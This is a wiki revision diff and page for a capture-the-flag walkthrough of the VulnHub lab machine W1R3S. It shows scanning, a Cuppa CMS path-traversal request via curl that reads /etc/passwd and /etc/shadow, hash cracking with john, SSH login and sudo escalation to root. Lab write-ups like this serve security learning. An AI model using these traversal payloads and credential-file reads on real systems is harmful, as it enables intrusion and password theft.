Difference between revisions of "W1R3S: 1.0.1 ~ VulnHub - CTF Walkthrough"
m (→Enumeration) |
m (→Exploitation) |
||
| Line 45: | Line 45: | ||
=== Exploitation === | === Exploitation === | ||
| − | + | <syntaxhighlight lang=shell-session highlight="4" line> | |
| − | + | root@blaksec:/media/sf_VM_Transfer/Pentesting/w1r3s# curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://localhost/administrator/alerts/alertConfigField.php |grep sbin | |
| − | + | daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin | |
| + | bin:x:2:2:bin:/bin:/usr/sbin/nologin | ||
| + | sys:x:3:3:sys:/dev:/usr/sbin/nologin | ||
| + | ...... | ||
| + | gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin | ||
| + | nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin | ||
| + | sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin | ||
| + | </syntaxhighlight> | ||
| + | And taking it a step further... | ||
| + | <syntaxhighlight lang=shell-session highlight="" line> | ||
| + | root@blaksec:/media/sf_VM_Transfer/Pentesting/w1r3s# curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://localhost/administrator/alerts/alertConfigField.php | ||
| + | ... | ||
| + | root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0 | ||
| + | ... | ||
| + | www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7::: | ||
| + | ... | ||
| + | w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:999... | ||
| + | </syntaxhighlight> | ||
| + | |||
| + | Didn't take long to crack the hashes with good old trusty '''john''' | ||
| + | |||
| + | |||
<syntaxhighlight lang=shell-session highlight="4,5,6,7" line> | <syntaxhighlight lang=shell-session highlight="4,5,6,7" line> | ||
| − | + | root@kali:~/Desktop/w1r3s# john --show shadow.txt | |
| − | + | w1r3s:computer | |
| + | www-data:www-data | ||
| + | |||
| + | 2 password hashes cracked, 1 left | ||
| + | |||
| + | </syntaxhighlight> | ||
| + | |||
| + | <syntaxhighlight lang=shell-session highlight="" line> | ||
| + | root@blaksec:/media/sf_VM_Transfer/Pentesting/w1r3s# ssh w1r3s@$TANGO | ||
| + | The authenticity of host '192.168.56.101 (192.168.56.101)' can't be established. | ||
| + | ECDSA key fingerprint is SHA256:/3N0PzPMqtXlj9QWJFMbCufh2W95JylZ/oF82NkAAto. | ||
| + | Are you sure you want to continue connecting (yes/no)? yes | ||
| + | Warning: Permanently added '192.168.56.101' (ECDSA) to the list of known hosts. | ||
| + | ---------------------- | ||
| + | Think this is the way? | ||
| + | ---------------------- | ||
| + | Well,........possibly. | ||
| + | ---------------------- | ||
| + | w1r3s@192.168.56.101's password: | ||
| + | Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.13.0-36-generic x86_64) | ||
| + | |||
| + | * Documentation: https://help.ubuntu.com | ||
| + | * Management: https://landscape.canonical.com | ||
| + | * Support: https://ubuntu.com/advantage | ||
| + | |||
| + | 108 packages can be updated. | ||
| + | 6 updates are security updates. | ||
| + | |||
| + | .....You made it huh?.... | ||
| + | Last login: Sun Apr 1 14:38:25 2018 from 192.168.56.200 | ||
| + | w1r3s@W1R3S:~$ | ||
</syntaxhighlight> | </syntaxhighlight> | ||
| − | + | ||
<syntaxhighlight lang=shell-session highlight="" line> | <syntaxhighlight lang=shell-session highlight="" line> | ||
| − | + | w1r3s@W1R3S:~$ sudo -l | |
| − | + | sudo: unable to resolve host W1R3S: Connection refused | |
| + | [sudo] password for w1r3s: | ||
| + | Matching Defaults entries for w1r3s on W1R3S: | ||
| + | env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin | ||
| + | |||
| + | User w1r3s may run the following commands on W1R3S: | ||
| + | (ALL : ALL) ALL | ||
</syntaxhighlight> | </syntaxhighlight> | ||
| + | <syntaxhighlight lang=shell-session highlight="" line> | ||
| + | w1r3s@W1R3S:~$ sudo /bin/bash | ||
| + | sudo: unable to resolve host W1R3S: Connection refused | ||
| + | root@W1R3S:~# cd /root | ||
| + | root@W1R3S:/root# ls | ||
| + | flag.txt | ||
| + | root@W1R3S:/root# cat flag.txt | ||
| + | ----------------------------------------------------------------------------------------- | ||
| + | ____ ___ _ _ ____ ____ _ _____ _ _ _ _ _____ ___ ___ _ _ ____ | ||
| + | / ___/ _ \| \ | |/ ___| _ \ / \|_ _| | | | | / \|_ _|_ _/ _ \| \ | / ___| | ||
| + | | | | | | | \| | | _| |_) | / _ \ | | | | | | | / _ \ | | | | | | | \| \___ \ | ||
| + | | |__| |_| | |\ | |_| | _ < / ___ \| | | |_| | |___ / ___ \| | | | |_| | |\ |___) | | ||
| + | \____\___/|_| \_|\____|_| \_\/_/ \_\_| \___/|_____/_/ \_\_| |___\___/|_| \_|____/ | ||
| + | |||
| + | ----------------------------------------------------------------------------------------- | ||
| + | |||
| + | .-----------------TTTT_-----_______ | ||
| + | /''''''''''(______O] ----------____ \______/]_ | ||
| + | __...---'"""\_ --'' Q ___________@ | ||
| + | |''' ._ _______________=---------""""""" | ||
| + | | ..--''| l L |_l | | ||
| + | | ..--'' . /-___j ' ' | ||
| + | | ..--'' / , ' ' | ||
| + | |--'' / ` \ | ||
| + | L__' \ - | ||
| + | - '-. | ||
| + | '. / | ||
| + | '-./ | ||
| + | |||
| + | ---------------------------------------------------------------------------------------- | ||
| + | YOU HAVE COMPLETED THE | ||
| + | __ __ ______________________ _________ | ||
| + | / \ / \/_ \______ \_____ \ / _____/ | ||
| + | \ \/\/ / | || _/ _(__ < \_____ \ | ||
| + | \ / | || | \/ \/ \ | ||
| + | \__/\ / |___||____|_ /______ /_______ /.INC | ||
| + | \/ \/ \/ \/ CHALLENGE, V 1.0 | ||
| + | ---------------------------------------------------------------------------------------- | ||
| + | |||
| + | CREATED BY SpecterWires | ||
| + | |||
| + | ------------------------------------------------------------------------------ | ||
| + | </syntaxhighlight> | ||
== Final Notes == | == Final Notes == | ||
Revision as of 17:45, 20 June 2018
Contents
Objective
xxxxxxxxxxxxxxxxxxxxx
Source: [xxxxxx]
Status: [Completed]
Methodology
Discovery
root@blaksec:/ # export TANGO=192.168.56.101root@kali:~/Desktop/w1r3s# nmap -O -sT -sV -p- -T5 192.168.56.101
Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-26 19:01 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.101
Host is up (0.00093s latency).
Not shown: 55528 filtered ports, 10003 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 08:00:27:CB:EE:8B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.8
Network Distance: 1 hop
Service Info: Host: W1R3S.inc; OS: Linux; CPE: cpe:/o:linux:linux_kernelEntry Point #1 - Port 80 (HTTP)
Enumeration
A quick scan with dirb came back with two directories wordpress and administrator. The former runs the obvious - Word Press, the latter - CUPPA CMS
WordPress is configured to run under localhost so we need to update /etc/hosts
192.168.56.101 localhostA quick checked of WordPress with wp-scan did not reveal anything interesting. Gut feel tells me to put that aside and move to CUPPA older versions of which, according to google, come with a LFI vulnerability.
Exploitation
root@blaksec:/media/sf_VM_Transfer/Pentesting/w1r3s# curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://localhost/administrator/alerts/alertConfigField.php |grep sbin
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
......
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologinAnd taking it a step further...
root@blaksec:/media/sf_VM_Transfer/Pentesting/w1r3s# curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://localhost/administrator/alerts/alertConfigField.php
...
root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0
...
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
...
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:999...Didn't take long to crack the hashes with good old trusty john
root@kali:~/Desktop/w1r3s# john --show shadow.txt
w1r3s:computer
www-data:www-data
2 password hashes cracked, 1 leftroot@blaksec:/media/sf_VM_Transfer/Pentesting/w1r3s# ssh w1r3s@$TANGO
The authenticity of host '192.168.56.101 (192.168.56.101)' can't be established.
ECDSA key fingerprint is SHA256:/3N0PzPMqtXlj9QWJFMbCufh2W95JylZ/oF82NkAAto.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.101' (ECDSA) to the list of known hosts.
----------------------
Think this is the way?
----------------------
Well,........possibly.
----------------------
w1r3s@192.168.56.101's password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.13.0-36-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
108 packages can be updated.
6 updates are security updates.
.....You made it huh?....
Last login: Sun Apr 1 14:38:25 2018 from 192.168.56.200
w1r3s@W1R3S:~$
w1r3s@W1R3S:~$ sudo -l
sudo: unable to resolve host W1R3S: Connection refused
[sudo] password for w1r3s:
Matching Defaults entries for w1r3s on W1R3S:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User w1r3s may run the following commands on W1R3S:
(ALL : ALL) ALLw1r3s@W1R3S:~$ sudo /bin/bash
sudo: unable to resolve host W1R3S: Connection refused
root@W1R3S:~# cd /root
root@W1R3S:/root# ls
flag.txt
root@W1R3S:/root# cat flag.txt
-----------------------------------------------------------------------------------------
____ ___ _ _ ____ ____ _ _____ _ _ _ _ _____ ___ ___ _ _ ____
/ ___/ _ \| \ | |/ ___| _ \ / \|_ _| | | | | / \|_ _|_ _/ _ \| \ | / ___|
| | | | | | \| | | _| |_) | / _ \ | | | | | | | / _ \ | | | | | | | \| \___ \
| |__| |_| | |\ | |_| | _ < / ___ \| | | |_| | |___ / ___ \| | | | |_| | |\ |___) |
\____\___/|_| \_|\____|_| \_\/_/ \_\_| \___/|_____/_/ \_\_| |___\___/|_| \_|____/
-----------------------------------------------------------------------------------------
.-----------------TTTT_-----_______
/''''''''''(______O] ----------____ \______/]_
__...---'"""\_ --'' Q ___________@
|''' ._ _______________=---------"""""""
| ..--''| l L |_l |
| ..--'' . /-___j ' '
| ..--'' / , ' '
|--'' / ` \
L__' \ -
- '-.
'. /
'-./
----------------------------------------------------------------------------------------
YOU HAVE COMPLETED THE
__ __ ______________________ _________
/ \ / \/_ \______ \_____ \ / _____/
\ \/\/ / | || _/ _(__ < \_____ \
\ / | || | \/ \/ \
\__/\ / |___||____|_ /______ /_______ /.INC
\/ \/ \/ \/ CHALLENGE, V 1.0
----------------------------------------------------------------------------------------
CREATED BY SpecterWires
------------------------------------------------------------------------------Final Notes
xxx
Appendix A: Vulnerability Detail and Mitigation
| Rating | High |
| Description | xxxx |
| Impact | xxxxxxxxxxxxxxxxxxxxxxxxxxxx |
| Remediation | xxxxxxxxxxxxxxxxx |